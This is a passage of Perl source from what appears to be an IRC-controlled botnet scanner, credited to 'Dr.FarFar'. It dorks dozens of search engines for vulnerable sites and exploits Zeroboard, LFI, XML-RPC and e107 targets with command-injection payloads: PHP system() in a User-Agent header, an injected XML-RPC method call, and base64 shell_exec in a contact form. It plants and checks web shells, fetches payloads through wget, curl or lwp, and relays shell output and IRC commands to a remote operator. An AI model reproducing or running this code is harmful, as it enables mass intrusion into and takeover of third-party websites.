            my $coba = "http://".$site.$bug;
            if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
                my $cek = &get_content($coba);sleep(1);
                if ($cek =~ /Zeroboard/) { system("./zbc $coba 80");sleep(1);
                    my $vulner1 = "http://".$site.$action."?cmd=";
                    my $vulner2 = "http://".$site.$action.$wgetdon;
                    my $vulner3 = "http://".$site.$action.$lwpdon;
                    my $vulner4 = "http://".$site.$action.$curldon;
                    my $vuln1 = "http://".$site."/data/kekkaishi.php";
                    my $check2 = &get_content($vulner1);
                    if ($check2 =~ /Byroe Team/) {
                        if ($zerowget == 1) { my $coba1 = &get_content($vulner2);sleep(2); }
                        if ($zerolwp == 1 ) { my $coba2 = &get_content($vulner3);sleep(2); }
                        if ($zerocurl == 1) { my $coba3 = &get_content($vulner4);sleep(2); }
                        my $check1 = &get_content($vuln1);
                        if ($check1 =~ /stunshell/i) {
                            my $safe = ""; my $os = ""; my $uid = "";
                            if ($check1 =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
                            if ($check1 =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
                            if ($check1 =~ m/uid=(.*?)gid=/) {$uid = $1;}
                                &msg("$admin","$zerologo15$engine 9<4=9>9 sHeLL 9<4=9>9 ".$vuln1."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
                                &msg("$chan","$zerologo15$engine 9<4=9>9 sHeLL 9<4=9>9 ".$vuln1."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
                        } else {
                            &msg("$chan","$zerologo15$engine 9<4=9>9 Cek dewe 15 $vulner1 ");
                        } sleep(2);
                    }
                }
            } exit; }
        }
    }
}

##################################################################################

sub search_engine() {
    my (@total,@clean);
    my $chan = $_[0];
    my $bug = $_[1];
    my $dork = $_[2];
    my $engine = $_[3];
    my $logo = $_[4];
    if ($gps == 1) {
    if ($engine eq "JacKAE") { my @jackae = &jack1($dork."+site:ae"); push(@total,@jackae); }
    if ($engine eq "JacKAR") { my @jackar = &jack2($dork."+site:ar"); push(@total,@jackar); }
    if ($engine eq "JacKAT") { my @jackat = &jack3($dork."+site:at"); push(@total,@jackat); }
    if ($engine eq "JacKAU") { my @jackau = &jack4($dork."+site:au"); push(@total,@jackau); }
    if ($engine eq "JacKBR") { my @jackbr = &jack5($dork."+site:br"); push(@total,@jackbr); }
    if ($engine eq "JacKCA") { my @jackca = &jack1($dork."+site:ca"); push(@total,@jackca); }
    if ($engine eq "JacKCL") { my @jackcl = &jack2($dork."+site:cl"); push(@total,@jackcl); }
    if ($engine eq "JacKCN") { my @jackcn = &jack3($dork."+site:cn"); push(@total,@jackcn); }
    if ($engine eq "JacKCoM") { my @jackcom = &jack4($dork."+site:com"); push(@total,@jackcom); }
    if ($engine eq "JacKCZ") { my @jackcz = &jack5($dork."+site:cz"); push(@total,@jackcz); }
    if ($engine eq "JacKDE") { my @jackde = &jack1($dork."+site:de"); push(@total,@jackde); }
    if ($engine eq "JacKDK") { my @jackdk = &jack2($dork."+site:dk"); push(@total,@jackdk); }
    if ($engine eq "JacKES") { my @jackes = &jack3($dork."+site:es"); push(@total,@jackes); }
    if ($engine eq "JacKEU") { my @jackeu = &jack4($dork."+site:eu"); push(@total,@jackeu); }
    if ($engine eq "JacKFR") { my @jackfr = &jack5($dork."+site:fr"); push(@total,@jackfr); }
    if ($engine eq "JacKHU") { my @jackhu = &jack1($dork."+site:hu"); push(@total,@jackhu); }
    if ($engine eq "JacKID") { my @jackid = &jack2($dork."+site:id"); push(@total,@jackid); }
    if ($engine eq "JacKIL") { my @jackil = &jack3($dork."+site:il"); push(@total,@jackil); }
    if ($engine eq "JacKIN") { my @jackin = &jack4($dork."+site:in"); push(@total,@jackin); }
    if ($engine eq "JacKInfO") { my @jackinfo = &jack5($dork."+site:info"); push(@total,@jackinfo); }
    if ($engine eq "JacKIR") { my @jackir = &jack1($dork."+site:ir"); push(@total,@jackir); }
    if ($engine eq "JacKIT") { my @jackit = &jack2($dork."+site:it"); push(@total,@jackit); }
    if ($engine eq "JacKJP") { my @jackjp = &jack3($dork."+site:jp"); push(@total,@jackjp); }
    if ($engine eq "JacKKR") { my @jackkr = &jack4($dork."+site:kr"); push(@total,@jackkr); }
    if ($engine eq "JacKMX") { my @jackmx = &jack5($dork."+site:mx"); push(@total,@jackmx); }
    if ($engine eq "JacKMY") { my @jackmy = &jack1($dork."+site:my"); push(@total,@jackmy); }
    if ($engine eq "JacKNeT") { my @jacknet = &jack2($dork."+site:net"); push(@total,@jacknet); }
    if ($engine eq "JacKNL") { my @jacknl = &jack3($dork."+site:nl"); push(@total,@jacknl); }
    if ($engine eq "JacKOrG") { my @jackorg = &jack4($dork."+site:org"); push(@total,@jackorg); }
    if ($engine eq "JacKPH") { my @jackph = &jack5($dork."+site:ph"); push(@total,@jackph); }
    if ($engine eq "JacKPL") { my @jackpl = &jack1($dork."+site:pl"); push(@total,@jackpl); }
    if ($engine eq "JacKRO") { my @jackro = &jack2($dork."+site:ro"); push(@total,@jackro); }
    if ($engine eq "JacKRU") { my @jackru = &jack3($dork."+site:ru"); push(@total,@jackru); }
    if ($engine eq "JacKTH") { my @jackth = &jack4($dork."+site:th"); push(@total,@jackth); }
    if ($engine eq "JacKUA") { my @jackua = &jack5($dork."+site:ua"); push(@total,@jackua); }
    if ($engine eq "JacKUK") { my @jackuk = &jack1($dork."+site:uk"); push(@total,@jackuk); }
    if ($engine eq "JacKUS") { my @jackus = &jack2($dork."+site:us"); push(@total,@jackus); }
    if ($engine eq "JacKSI") { my @jacksi = &jack3($dork."+site:si"); push(@total,@jacksi); }
    if ($engine eq "JacKBE") { my @jackbe = &jack4($dork."+site:be"); push(@total,@jackbe); }
    if ($engine eq "JacKBIZ") { my @jackbiz = &jack5($dork."+site:biz"); push(@total,@jackbiz); }
    }
    if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); }
    if ($gps2 == 1) {
    if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); }
    if ($engine eq "YaHoo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }
    if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); }
    if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }
    if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); }
    if ($engine eq "OnEt") { my @onet = &onet($dork); push(@total,@onet); }
    if ($engine eq "CLusTy") { my @clusty = &clusty($dork); push(@total,@clusty); }
    if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); }
    if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); }
    if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); }
    if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); }
    if ($engine eq "SeZNam") { my @seznam = &seznam($dork); push(@total,@seznam); }
    if ($engine eq "BigLobe") { my @biglobe = &biglobe($dork); push(@total,@biglobe); }
    }
    @clean = &clean(@total);
    if ($silentmode == 0) {
    &msg("$chan","$logo15$engine 4<9=4>9 Total:4 [15".scalar(@total)."4] 9 Clean:4 [15".scalar(@clean)."4] "); }
    return @clean;
}
##################################################################################
sub isFound() {
    my $status = 0;
    my $link = $_[0];
    my $reqexp = $_[1];
    my $res = &get_content($link);
    if ($res =~ /$reqexp/) { $status = 1 }
    return $status;
}

sub get_content() {
    my $url = $_[0];
    my $ua = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout($timot);
    my $req = HTTP::Request->new(GET => $url);
    my $res = $ua->request($req);
    return $res->content;
}
######################################### SEARCH ENGINE

sub jack1() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=100){
        my $search = ($jack1.uri_escape($key)."&num=100&start=".$i);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
            my $link = $1;
            if ($link !~ /google/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub jack2() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=100){
        my $search = ($jack2.uri_escape($key)."&num=100&start=".$i);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
            my $link = $1;
            if ($link !~ /google/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub jack3() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=100){
        my $search = ($jack3.uri_escape($key)."&num=100&start=".$i);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
            my $link = $1;
            if ($link !~ /google/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub jack4() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=100){
        my $search = ($jack4.uri_escape($key)."&num=100&start=".$i);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
            my $link = $1;
            if ($link !~ /google/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub jack5() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=100){
        my $search = ($jack5.uri_escape($key)."&num=100&start=".$i);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
            my $link = $1;
            if ($link !~ /google/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub google() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=100){
        my $search = ("http://www.google.com/search?q=".uri_escape($key)."&num=100&filter=0&start=".$i);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
            my $link = $1;
            if ($link !~ /google/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub walla() {
    my @list;
    my $key = $_[0];
    for ($b=0; $b<=100; $b+=1) {
        my $search = ("http://search.walla.co.il/?q=".uri_escape($key)."&type=text&page=".$b);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"http:\/\/(.+?)\" title=/g) {
            my $link = $1;
            if ($link !~ /walla\.co\.il/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub yahoo(){
    my @list;
    my $key = $_[0];
    for ($b=1; $b<=1000; $b+=10) {
        my $search = ("http://search.yahoo.com/search?p=".uri_escape($key)."&b=".$b);
        my $res = &search_engine_query($search);
        while ($res =~ m/http\%3a\/\/(.+?)\"/g) {
            my $link = $1;
            if ($link !~ /yahoo\.com/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub ask() {
    my @list;
    my $key = $_[0];
    for (my $i=1; $i<=1000; $i+=100) {
        my $search = ("http://uk.ask.com/web?q=".uri_escape($key)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
        my $res = &search_engine_query($search);
        while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
            my $link = $1;
            if ($link !~ /ask\.com/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub onet() {
    my @list;
    my $key = $_[0];
    my $b   = 0;
    for ($b=1; $b<=400; $b+=10) {
        my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".uri_escape($key));
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"http:\/\/(.*?)\">/g) {
            my $link = $1;
            if ($link !~ /onet|webcache|query/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub clusty() {
    my @list;
    my $key = $_[0];
    my $b   = 0;
    for ($b=10; $b<=200; $b+=10) {
        my $search = ("http://search.yippy.com/search?input-form=clusty-simple&v%3Asources=webplus-ns-aaf&v%3Aproject=clusty&query=".uri_escape($key)."&v:state=root|root-".$b."-20|0&");
        my $res = &search_engine_query($search);
        if ($res !~ /next/) {$b=100;}
        while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
            my $link = $1;
            if ($1 !~ /yippy\.com/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub bing() {
    my @list;
    my $key = $_[0];
    for (my $i=1; $i<=400; $i+=10) {
        my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&first=".$i);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
            my $link = $1;
            if ($link !~ /google/) {
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub sapo(){
    my @list;
    my $key = $_[0];
    for ($b=1; $b<=50; $b+=1) {
        my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$b."&q=".uri_escape($key)."&st=local");
        my $res = &search_engine_query($search);
        if ($res !~ m/Next/i) {$b=50;}
        while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
            my $link = $1;
            if ($1 !~ /\.sapo\.pt/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub lycos() {
  my @list;
  my $key = $_[0];
    for ($b=0; $b<=50; $b+=1) {
        my $search = ("http://search.lycos.com/web?q=".uri_escape($key)."&pn=".$b);
        my $res = &search_engine_query($search);
        while ($res =~ m/title=\"http:\/\/(.*?)\"/g) {
            my $link = $1;
            if ($link !~ /lycos\.com/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub uol() {
    my @list;
    my $key = $_[0];
    for ($b=0; $b<=1000; $b+=10) {
        my $search = ("http://busca.uol.com.br/web/?ref=homeuol&q=".uri_escape($key)."&start=".$b);
        my $res = &search_engine_query($search);
        if ($res =~ m/retornou nenhum resultado/i) {$b=500;}
        while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) {
            my $link = $1;
            if ($link !~ /uol\.com\.br|\/web/i){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub seznam() {
    my @list;
    my $key = $_[0];
    for ($b=1; $b<=300; $b+=20) {
        my $search = ("http://search.seznam.cz/?q=".uri_escape($key)."&count=20&from=".$b);
        my $res = &search_engine_query($search);
        while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) {
            my $link = $1;
            if ($link !~ /seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/i){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub hotbot() {
  my @list;
  my $key = $_[0];
    for ($b=0; $b<=50; $b+=1) {
        my $search = ("http://www.hotbot.com/search/web?pn=".$b."&q=".uri_escape($key));
        my $res = &search_engine_query($search);
        if ($res =~ m/had no web result/i) {$b=50;}
        while ($res =~ m/href=\"http:\/\/(.+?)\" title=/g) {
            my $link = $1;
            if ($link !~ /hotbot\.com/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub aol() {
    my @list;
    my $key = $_[0];
    for ($b=0; $b<=300; $b+=10) {
        my $search = ("http://search.aol.com/aol/search?q=".uri_escape($key)."&page=".$b);
        my $res = &search_engine_query($search);
        while ($res =~ m/href=\"http:\/\/(.*?)\"/g) {
            my $link = $1;
            if ($link !~ /aol\.com/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub biglobe {
  my $key = $_[0];
  my @list;
  for ($b=1; $b<=500; $b+=10) {
    $num += $num;
    my $search = "http://cgi.search.biglobe.ne.jp/cgi-bin/search-st_lp2?start=".$b."&ie=utf8&num=".$num."&q=".uri_escape($key)."&lr=all";
    my $res = &search_engine_query($search);
    while ( $res =~ m/<a href=\"http:\/\/(.+?)\"/g ) {
        my $link = $1;
        if ($link !~ /biglobe/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

#########################################

sub clean() {
    my @cln = ();
    my %visit = ();
    foreach my $element (@_) {
        $element =~ s/\/+/\//g;
        next if $visit{$element}++;
        push @cln, $element;
    }
    return @cln;
}

sub links() {
    my @list;
    my $link = $_[0];
    my $host = $_[0];
    my $hdir = $_[0];
    $hdir =~ s/(.*)\/[^\/]*$/\1/;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $host .= "/";
    $link .= "/";
    $hdir .= "/";
    $host =~ s/\/\//\//g;
    $hdir =~ s/\/\//\//g;
    $link =~ s/\/\//\//g;
    push(@list,$link,$host,$hdir);
    return @list;
}

sub search_engine_query() {
    my $url = $_[0];
    $url =~ s/http:\/\///;
    my $host = $url;
    my $query = $url;
    my $page  = "";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~ s/$host//;
    if ($query eq "") { $query = "/"; }
        eval {
            my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
            my $sget = "GET $query HTTP/1.0\r\n";
            $sget .= "Host: $host\r\n";
            $sget .= "Accept: */*\r\n";
            $sget .= "User-Agent: $uagent\r\n";
            $sget .= "Connetion: Close\r\n\r\n";
            print $sock $sget;
            my @pages = <$sock>;
            $page = "@pages";
            close($sock);
        };
    return $page;
}

#########################################

sub shell() {
    my $path = $_[0];
    my $cmd = $_[1];
    if ($cmd =~ /cd (.*)/) {
        chdir("$1") || &msg("$path","No such file or directory");
        return;
    }
    elsif ($pid = fork) { waitpid($pid, 0); }
    else { if (fork) { exit; } else {
        my @output = `$cmd 2>&1 3>&1`;
        my $c = 0;
        foreach my $output (@output) {
            $c++;
            chop $output;
            &msg("$path","$output");
            if ($c == 5) { $c = 0; sleep 3; }
        }
        exit;
    }}
}

sub isAdmin() {
    my $status = 0;
    my $nick = $_[0];
    if ($nick eq $admin) { $status = 1; }
    return $status;
}

sub msg() {
    return unless $#_ == 1;
    sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
}

sub nick() {
    return unless $#_ == 0;
    sendraw("NICK $_[0]");
}
sub notice() {
    return unless $#_ == 1;
    sendraw("NOTICE $_[0] :$_[1]");
}

sub cmdlfi() {
my $browser = LWP::UserAgent->new;
my $url  = $_[0];
my $cmd  = $_[1];
my $chan = $_[2];
my $hie = "lobex<?system(\"$cmd 2> /dev/stdout\"); ?>byroe";
$browser->agent("$hie");
$browser->timeout(7);
$response = $browser->get( $url );
if ($response->content =~ /lobex(.*)byroe/s) {
&msg("$chan","$lfilogo9 ".$1." ");
} else {
&msg("$chan","$lfilogo15 No Output ");
}
}

sub cmdxml() {
my $jed  = $_[0];
my $dwa  = $_[1];
my $chan = $_[2];
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
        $exploit = "<?xml version=\"1.0\"?><methodCall>";
        $exploit .= "<methodName>test.method</methodName>";
        $exploit .= "<params><param><value><name>',''));";
        $exploit .= "echo'bamby';system('".$dwa."');echo'solo';exit;/*</name></value></param></params></methodCall>";
my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit);
if ($response->content =~ /bamby(.*)solo/s) {
&msg("$chan","$xmllogo9 $1 ");
} else {
&msg("$chan","$xmllogo15 No Output ");
}
}

sub cmde107() {
my $path  = $_[0];
my $code = $_[1];
my $chan  = $_[2];
my $codecmd = encode_base64($code);
my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"));';
    my $req = HTTP::Request->new(POST => $path);
    $req->content_type('application/x-www-form-urlencoded');
    $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
    my $ua = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout(7);
    my $res = $ua->request($req);
my $data = $res->as_string;
if ( $data =~ /ByroeNet(.*)/ ){
     $mydata = $1;
&msg("$chan","0,1(0E1070)4 $mydata");
}
else { &msg("$chan","0,1(0E1070)4 No Output"); }
}

########################################################################################################################

        https://www.facebook.com/Dr.FarFar
        http://Dr-FarFar.BlogSpot.com/

        ________         __________                __________
        ___  __ \___________  ____/______ ____________  ____/______ _________
        __  / / /__  ___/__  /_    _  __ `/__  ___/__  /_    _  __ `/__  ___/
        _  /_/ / _  /___ _  __/    / /_/ / _  /    _  __/    / /_/ / _  /
        /_____/  /_/ _(_)/_/       \__,_/  /_/     /_/       \__,_/  /_/

                             ~\ Dr.FarFar /~